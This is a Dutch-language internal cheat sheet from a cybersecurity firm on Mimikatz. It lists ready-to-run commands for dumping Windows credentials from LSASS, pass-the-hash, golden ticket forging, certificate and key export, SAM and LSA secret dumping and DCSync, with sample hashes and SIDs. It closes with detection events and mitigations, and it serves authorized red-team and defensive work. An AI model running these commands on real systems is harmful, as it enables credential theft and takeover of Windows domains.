Mimikatz
Bron: gentilkiwi/mimikatz Auteur: Johan Beysen | Fox & Fish Cybersecurity
1. Wat is Mimikatz?
Mimikatz is een post-exploitation tool voor Windows waarmee credential-informatie uit het geheugen kan worden geëxtraheerd. Het wordt zowel door red teamers als aanvallers gebruikt voor lateral movement en privilege escalation.
Enkel met toestemming
Mimikatz is uitsluitend toegestaan in geautoriseerde engagements, CTF-omgevingen of geïsoleerde labs. Gebruik op productiesystemen zonder toestemming is illegaal.
2. Voorbereiding
privilege::debug
Waarom privilege::debug?
Debug-rechten zijn nodig om LSASS-geheugen te kunnen lezen. Vereist lokale adminrechten of SYSTEM.
3. Sekurlsa — Credential Dumping
# Alle ingelogde credentials ophalen (wachtwoorden, hashes, tickets)
sekurlsa::logonpasswords
# Kerberos tickets exporteren naar .kirbi bestanden
sekurlsa::tickets /export
# Pass-the-Hash: command uitvoeren als andere gebruiker via NTLM hash
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
| Command | Wat het doet |
|---|---|
sekurlsa::logonpasswords |
Dumps wachtwoorden en hashes uit LSASS |
sekurlsa::tickets /export |
Exporteert alle Kerberos tickets |
sekurlsa::pth |
Pass-the-Hash aanval starten |
4. Kerberos
# Alle Kerberos tickets weergeven en exporteren
kerberos::list /export
# Ticket importeren (Pass-the-Ticket)
kerberos::ptt c:\chocolate.kirbi
# Golden Ticket aanmaken
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
Golden Ticket
Een Golden Ticket geeft onbeperkte domeinrechten zolang het krbtgt hash niet gereset wordt. Detecteerbaar via abnormale ticket lifetimes in SIEM.
5. Crypto — Certificaten & Sleutels
# CryptoAPI patchen (voor certificaat export)
crypto::capi
crypto::cng
# Certificaten exporteren (huidige gebruiker)
crypto::certificates /export
# Certificaten exporteren (lokale machine store)
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
# Private keys exporteren
crypto::keys /export
crypto::keys /machine /export
6. Vault & LSA Dump
# Windows Credential Vault raadplegen
vault::cred
vault::list
# Met verhoogde rechten (token elevatie + vault dump)
token::elevate
vault::cred
vault::list
# SAM database dumpen (lokale accounts)
lsadump::sam
# LSA secrets dumpen (service accounts, cached creds)
lsadump::secrets
# Cached domain credentials
lsadump::cache
# Herstel origineel token
token::revert
# DCSync aanval: domeincontroller synchronisatie simuleren
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
DCSync
lsadump::dcsync simuleert een domeincontroller en haalt hashes op zonder LSASS te hoeven aanraken. Vereist Domain Admin of gelijkwaardige rechten. Detecteerbaar via 4662-events in het DC event log.
7. Detectie & Mitigatie
| Techniek | Detectiesignaal |
|---|---|
sekurlsa::logonpasswords |
LSASS-toegang via onbekend process (Event 10 Sysmon) |
lsadump::dcsync |
Event 4662 op domeincontroller |
kerberos::golden |
Ticket met ongewone lifetime in SIEM |
sekurlsa::pth |
Nieuw process met onverwachte token (Event 4624 type 9) |
Mitigaties:
- Protected Users security group activeren
- Credential Guard inschakelen (Windows 10+)
- LSA Protection:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1 - Privileged Access Workstations (PAW) gebruiken
Fox & Fish Cybersecurity | Intern gebruik